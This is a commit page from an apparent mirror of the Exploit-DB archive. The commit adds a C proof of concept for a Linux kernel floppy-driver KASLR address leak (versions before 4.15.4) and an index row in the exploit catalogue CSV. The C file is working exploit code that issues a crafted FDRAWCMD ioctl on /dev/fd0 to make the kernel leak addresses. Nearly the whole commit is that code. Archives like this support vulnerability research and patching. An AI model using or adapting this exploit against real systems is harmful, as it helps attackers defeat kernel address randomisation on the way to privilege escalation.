bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-03-23

Browse source 
1 changes to exploits/shellcodes

Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak
This commit is contained in:
Offensive Security 2018-03-23 05:01:51 +00:00
parent ce0c08bf93
commit 31a39a07b9
2 changed files with 41 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

40
exploits/linux/local/44325.c Normal file
View file

@ -0,0 +1,40 @@
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <linux/kernel.h>
#include <string.h>
#include <sys/mman.h>
#include <linux/fd.h>
static int drive_selector(int head) {
return (head << 2);
}
void fd_recalibrate(int fd) {
struct floppy_raw_cmd raw_cmd;
int tmp;
raw_cmd.flags = FD_RAW_INTR;
raw_cmd.cmd_count = 2;
// set up the command
raw_cmd.cmd[raw_cmd.cmd_count++] = 0x07;
raw_cmd.cmd[raw_cmd.cmd_count++] = drive_selector(0);
tmp = ioctl( fd, FDRAWCMD, &raw_cmd );
printf("Status:%d\n",tmp);
}
int main(){
printf("Start\n");
char *d;
struct floppy_raw_cmd *cmd;
int fd;
fd = open("/dev/fd0",O_RDWR | O_NDELAY);
fd_recalibrate(fd);
close(fd);
printf("End\n");
return 0;
}

1
files_exploits.csv
View file

@ -9609,6 +9609,7 @@ id,file,description,date,author,type,platform,port
44313,exploits/windows_x86-64/local/44313.txt,"Microsoft Windows - Desktop Bridge VFS Privilege Escalation",2018-03-20,"Google Security Research",local,windows_x86-64, 44313,exploits/windows_x86-64/local/44313.txt,"Microsoft Windows - Desktop Bridge VFS Privilege Escalation",2018-03-20,"Google Security Research",local,windows_x86-64,
44314,exploits/windows/local/44314.ps1,"Microsoft Windows - Desktop Bridge Virtual Registry Arbitrary File Read/Write Privilege Escalation",2018-03-20,"Google Security Research",local,windows, 44314,exploits/windows/local/44314.ps1,"Microsoft Windows - Desktop Bridge Virtual Registry Arbitrary File Read/Write Privilege Escalation",2018-03-20,"Google Security Research",local,windows,
44315,exploits/windows/local/44315.txt,"Microsoft Windows - Desktop Bridge Virtual Registry NtLoadKey Arbitrary File Read/Write Privilege Escalation",2018-03-20,"Google Security Research",local,windows, 44315,exploits/windows/local/44315.txt,"Microsoft Windows - Desktop Bridge Virtual Registry NtLoadKey Arbitrary File Read/Write Privilege Escalation",2018-03-20,"Google Security Research",local,windows,
44325,exploits/linux/local/44325.c,"Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak",2018-03-22,"Gregory Draperi",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139

Can't render this file because it is too large.